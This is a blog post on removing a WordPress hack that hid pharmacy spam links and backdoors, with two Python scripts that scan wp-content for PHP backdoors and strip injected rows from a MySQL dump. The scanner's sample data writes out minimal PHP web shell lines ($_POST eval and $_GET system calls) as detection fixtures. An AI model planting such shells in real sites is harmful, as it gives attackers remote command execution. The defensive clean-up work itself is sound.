Apr 12

It's all too common these days, but our WordPress blog was hacked again because it was still running an old version of WordPress (2.8.5).

It was a nasty hack that injected hidden pharmacy links into the footer of every page, and it was very difficult to remove. You can't see the links in the browser because they are hidden with CSS, so unless you have a tool to switch the CSS off, look at the cached copy of your blog in Google using the text-only option. Just upgrading the blog to the latest version of WordPress didn't work. I'm afraid the procedure described here needs a fairly good knowledge of exporting and importing MySQL databases, but there's a pretty good tutorial on how to do that here.

Now the first thing you need to do is make a backup of your existing blog, including all of its files (uploads, theme, plugins) and the database itself. Keep that backup untouched: you will want it if the clean-up goes wrong, and it is your only record of what the attacker changed.

It's a good idea to delete your spam comments first, because they can make your database dump large and awkward to edit in a text editor.

After you've downloaded your files, completely remove all the files from your blog folder on the server (see the exceptions below), including the wp-admin and wp-includes folders, because the hack leaves backdoors in these (disguised as image files). Don't just overwrite them with a fresh copy: an upgrade replaces WordPress's own files but leaves any extra files the attacker added exactly where they are.

For this hack, you can keep your uploads in /wp-content/uploads (the standard upload folder), your theme in /wp-content/themes/, and any plugins in /wp-content/plugins, but check them before you put them back: there should be no PHP files under uploads at all, and a file that claims to be an image but starts with <?php is a backdoor.
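Before putting those folders back, check them for anything that should not be there. The script below is an added example for this post, not part of the original clean-up: run against a copy of wp-content, it flags files that are PHP in disguise (the "image" backdoors mentioned above), PHP of any kind under uploads, and PHP that calls eval or decode functions. The directory layout it builds to demonstrate itself is constructed, and the three rules are an assumption about what a backdoor looks like; legitimate plugins occasionally use base64_decode, so treat the third kind of hit as something to read rather than something to delete.

```python
"""Check the wp-content folders you intend to keep for PHP backdoors.

Added example for this post, not the author's tool.  The sample tree it builds
is constructed for the demo, and the rules are assumptions about what a backdoor
looks like: every hit is something to review, not an automatic delete.
"""
import os
import re
import shutil
import sys
import tempfile

PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Calls that theme/plugin code rarely needs but web shells live on (assumption).
SHELL_CALLS = re.compile(rb"\b(eval|base64_decode|gzinflate|str_rot13|assert)\s*\(", re.IGNORECASE)


def classify(rel_path, data):
    """Return a reason to distrust a file, or None if it looks normal.

    rel_path is relative to wp-content, so its first component is the folder name.
    """
    ext = os.path.splitext(rel_path)[1].lower()
    is_php = ext in PHP_EXTENSIONS
    if not is_php and PHP_OPEN_TAG.search(data):
        return "PHP code inside a non-PHP file"            # the 'image' backdoor
    if is_php and rel_path.split("/")[0] == "uploads":
        return "PHP file under uploads (should never happen)"
    if is_php and SHELL_CALLS.search(data):
        return "PHP using eval/decode calls (review by hand)"
    return None


def scan_tree(root):
    """Walk a wp-content directory and return {relative path: reason} for every hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                data = fh.read(1024 * 1024)   # the first MiB is plenty for a web shell
            reason = classify(rel, data)
            if reason:
                findings[rel] = reason
    return findings


def build_sample_tree(root):
    """Construct a tiny wp-content layout: three clean files and three bad ones."""
    samples = {
        "uploads/2010/04/photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 64,      # real JPEG header
        "uploads/2010/04/logo.gif": b"GIF89a<?php eval(base64_decode($_POST['c'])); ?>",
        "uploads/2010/04/thumb.php": b"<?php system($_GET['cmd']); ?>",
        "themes/default/footer.php": b"<?php wp_footer(); ?>",
        "plugins/akismet/akismet.php": b"<?php /* Plugin Name: Akismet */ ?>",
        "plugins/seo/helper.php": b"<?php eval(gzinflate(base64_decode('SGk='))); ?>",
    }
    for rel, data in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)


def run_example():
    """Build the sample tree in a temp dir, scan it, clean up, and return the findings."""
    root = tempfile.mkdtemp(prefix="wp-content-")
    try:
        build_sample_tree(root)
        return scan_tree(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else run_example()
    for path, reason in sorted(hits.items()):
        print(f"{path}: {reason}")
```

Run it as `python check_wpcontent.py /path/to/wp-content` (the script name is mine); with no argument it scans the constructed sample tree and reports the gif-with-PHP, the PHP file under uploads and the eval-calling plugin file while leaving the ordinary photo, theme and plugin files alone. Point it at wp-content itself rather than at uploads, because the uploads rule keys off the first folder name in the path.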

Then upload the latest version of WordPress and edit wp-config.php with your server settings (although for this hack you can reuse your old wp-config.php). Read the old file before you reuse it, though: it is PHP, so it can hide a backdoor just as well as wp-admin can.

Next, export your database and open the dump in a plain-text editor (not Word or Write).

Search for the table called wp_options (just search for that text string) and you'll see entries such as:

(5, 0, 'users_can_register', '', 'yes'),
(6, 0, 'admin_email', 'carl@tourboxantalya.com', 'yes'),
(7, 0, 'start_of_week', '1', 'yes'),
(8, 0, 'use_balanceTags', '', 'yes'),
(9, 0, 'use_smilies', '1', 'yes'),
(10, 0, 'require_name_email', '1', 'yes'),
(11, 0, 'comments_notify', '1', 'yes'),
(12, 0, 'posts_per_rss', '10', 'yes'),
(13, 0, 'rss_excerpt_length', '50', 'yes'),
(14, 0, 'rss_use_excerpt', '0', 'yes'),
(15, 0, 'mailserver_url', 'mail.example.com', 'yes'),
(16, 0, 'mailserver_login', 'login@example.com', 'yes'),
(17, 0, 'mailserver_pass', 'password', 'yes'),
(18, 0, 'mailserver_port', '110', 'yes'),
(19, 0, 'default_category', '9', 'yes'),
(20, 0, 'default_comment_status', 'open', 'yes'),
(21, 0, 'default_ping_status', 'open', 'yes'),

And so on. Scroll down until you come to a chunk of gibberish: an option whose value runs to hundreds of lines of encoded text.

Delete the text inside the quotes (the option_value), and delete any rows whose option_name contains transient (names beginning _transient_; WordPress rebuilds them when it needs them). If you remove whole rows rather than just the value, watch the commas between rows and the semicolon at the end of the INSERT statement, or the import will fail. There may be other gibberish options, so keep going until you reach the start of the next table, which will begin with something like:

-- --------------------------------------------------------
-- Table structure for table `wp_post2cat`

CREATE TABLE IF NOT EXISTS `wp_post2cat` (

When you've done that, import the cleaned-up dump, run the upgrade, and with any luck you'll be back in business. If not, let us know via a comment and we can have a look for you. There are a lot of different hacks out there and most affect the header or footer files; this one is unusual in that it uses a backdoor in your wp-admin folder and keeps its payload in the database.
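Editing the dump by hand works for one blog, but the clean-up above can be scripted. The script below is an added example, not the author's method or a WordPress tool: it parses the wp_options INSERT statements in a mysqldump export, drops rows that are transients, rows whose value is PHP code, a large base64-looking blob, or CSS-hidden links, and rewrites each statement with the commas and closing semicolon intact so the result still imports. The sample dump it carries is constructed for the demo, the option names and the size threshold are assumptions about this hack, and the report it prints is meant to be read before you import anything (dropping a widget_text row, for instance, also drops your legitimate text widgets).

```python
"""Strip injected rows from the wp_options INSERTs of a mysqldump (added example, not the
post author's script; the sample dump and the rules below are constructed assumptions)."""
import re
import sys

TRANSIENT_RE = re.compile(r"^_(site_)?transient_")
PHP_RE = re.compile(r"\b(eval|base64_decode|gzinflate)\s*\(")
BASE64_BLOB_RE = re.compile(r"^[A-Za-z0-9+/=\s]{2000,}$")          # threshold is a guess
LINK_RE = re.compile(r"<a\b[^>]*href", re.IGNORECASE)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
INSERT_RE = re.compile(r"INSERT INTO `wp_options`(?:\s*\(([^)]*)\))?\s*VALUES\s*")

def suspicious(name, value):
    """Return the reason to drop a wp_options row, or None to keep it."""
    if TRANSIENT_RE.match(name):
        return "transient (WordPress rebuilds these when it needs them)"
    if PHP_RE.search(value):
        return "PHP code stored in option_value"
    if BASE64_BLOB_RE.match(value):
        return "large base64-like blob"
    if LINK_RE.search(value) and HIDDEN_RE.search(value):
        return "CSS-hidden links"
    return None

def parse_tuples(sql, pos):
    """Parse `(...), (...)` rows from sql[pos]; return ([(raw_text, fields)], end)."""
    rows, n = [], len(sql)
    while True:
        while pos < n and sql[pos] in " \t\r\n,":          # between rows
            pos += 1
        if pos >= n or sql[pos] != "(":
            return rows, pos
        start, pos, fields, cur, in_str = pos, pos + 1, [], [], False
        while pos < n:
            ch = sql[pos]
            pos += 1
            if in_str:
                if ch == "\\" and pos < n:                  # \' and \\ escapes
                    cur.append(sql[pos])
                    pos += 1
                elif ch == "'":
                    in_str = False
                else:
                    cur.append(ch)
            elif ch == "'":
                in_str = True
            elif ch in ",)":                                # end of a field
                fields.append("".join(cur))
                cur = []
                if ch == ")":
                    break
            elif not ch.isspace():                          # bare number or NULL
                cur.append(ch)
        rows.append((sql[start:pos], fields))

def clean_dump(sql):
    """Return (cleaned_sql, removed), removed being a list of (option_name, reason)."""
    out, removed, last = [], [], 0
    for m in INSERT_RE.finditer(sql):
        if m.start() < last:                  # matched text inside a statement already handled
            continue
        cols = [c.strip(" `") for c in (m.group(1) or "").split(",")]
        name_i = cols.index("option_name") if "option_name" in cols else 2
        value_i = cols.index("option_value") if "option_value" in cols else 3
        rows, end = parse_tuples(sql, m.end())
        kept = []
        for raw, fields in rows:
            reason = len(fields) > max(name_i, value_i) and suspicious(fields[name_i], fields[value_i])
            if reason:
                removed.append((fields[name_i], reason))
            else:
                kept.append(raw)
        out.append(sql[last:m.start()])
        if kept:                              # drop the whole statement if nothing survives
            out.append(m.group(0) + ",\n".join(kept) + ";")
        last = sql.find(";", end) + 1 or end  # resume past the ';' (find gives -1 if missing)
    out.append(sql[last:])
    return "".join(out), removed

SAMPLE_DUMP = """-- Constructed sample dump for this example, not a real site
INSERT INTO `wp_options` (`option_id`, `blog_id`, `option_name`, `option_value`, `autoload`) VALUES
(1, 0, 'siteurl', 'http://blog.example.com', 'yes'),
(2, 0, 'blogname', 'Carl\\'s Blog, Antalya', 'yes'),
(15, 0, '_transient_feed_0a1b2c', 'O:9:"SimplePie":0:{}', 'yes'),
(77, 0, 'widget_text', '<div style="display:none"><a href="http://pills.example/">buy</a></div>', 'yes'),
(78, 0, 'cache_widget_data', '""" + "QUFB" * 600 + """', 'yes'),
(79, 0, 'rss_cache', 'eval(base64_decode("ZWNobyAxOw=="));', 'no');

INSERT INTO `wp_posts` (`ID`, `post_title`) VALUES
(1, 'Hello world!');
"""

if __name__ == "__main__":
    source = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    cleaned_sql, dropped = clean_dump(source)
    for name, reason in dropped:
        print(f"removed {name}: {reason}", file=sys.stderr)
    sys.stdout.write(cleaned_sql)
```

`python clean_dump.py blog.sql > blog-clean.sql` (the script name is mine) writes the cleaned dump to standard output and the dropped rows to standard error; without an argument it runs on the built-in sample, where it drops the transient, the hidden-link widget, the 2400-character blob and the eval row and leaves siteurl, blogname and the wp_posts statement untouched. The tuple parser is character-level rather than regex-based because option values routinely contain commas, quotes and parentheses, which is exactly what makes the hand edit error-prone.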

Once you've done this, change your FTP, MySQL and WordPress passwords to be safe, and check the Users screen for administrator accounts you didn't create.

Let us know how you get on or if you need any help!
